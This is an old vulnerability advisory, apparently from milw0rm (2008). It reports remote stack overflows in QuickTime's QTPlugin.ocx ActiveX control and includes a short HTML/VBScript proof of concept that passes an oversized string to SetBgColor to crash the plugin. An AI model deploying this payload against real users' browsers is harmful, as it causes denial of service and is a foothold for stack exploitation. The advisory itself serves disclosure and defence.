69 lines
No EOL
1.1 KiB
Text
69 lines
No EOL
1.1 KiB
Text
Application: QuickTime <= 7.4.1 QTPlugin.ocx Multiple Remote Stack Overflow
|
|
|
|
Web Site: http://www.apple.com/fr/quicktime/download/
|
|
|
|
Platform: Windows
|
|
|
|
Bug: Multiple Remote Stack Overflow
|
|
|
|
-------------------------------------------------------
|
|
|
|
1) Introduction
|
|
|
|
2) Bug
|
|
|
|
3) Proof of concept
|
|
|
|
4) Credits
|
|
|
|
===========
|
|
|
|
1) Introduction
|
|
|
|
===========
|
|
|
|
A nice introduction to Quicktime Player can be found here : http://www.apple.com/quicktime/player/
|
|
|
|
======
|
|
|
|
2) Bug
|
|
|
|
======
|
|
|
|
Stack Overflow/Denial of service occurs when supplying a long string to theses functions:
|
|
|
|
-SetBgColor
|
|
-SetHREF
|
|
-SetMovieName
|
|
-SetTarget
|
|
-SetMatrix
|
|
|
|
=====
|
|
|
|
3)Proof of concept
|
|
|
|
=====
|
|
|
|
Proof of concept example [works with the others functions supplyed in section 2) ] :
|
|
<html>
|
|
<object classid='clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B' id='foo' ></object>
|
|
<input type="button" value="Hit me" language="VBScript" OnClick="test()">
|
|
<script language="VBScript">
|
|
sub test()
|
|
bar = String(515305, "A")
|
|
foo.SetBgColor bar
|
|
End Sub
|
|
</script>
|
|
</html>
|
|
|
|
=====
|
|
|
|
5)Credits
|
|
|
|
=====
|
|
|
|
laurent gaffié
|
|
|
|
laurent.gaffie{remove_this}[at]gmail[dot]com
|
|
|
|
# milw0rm.com [2008-02-13] |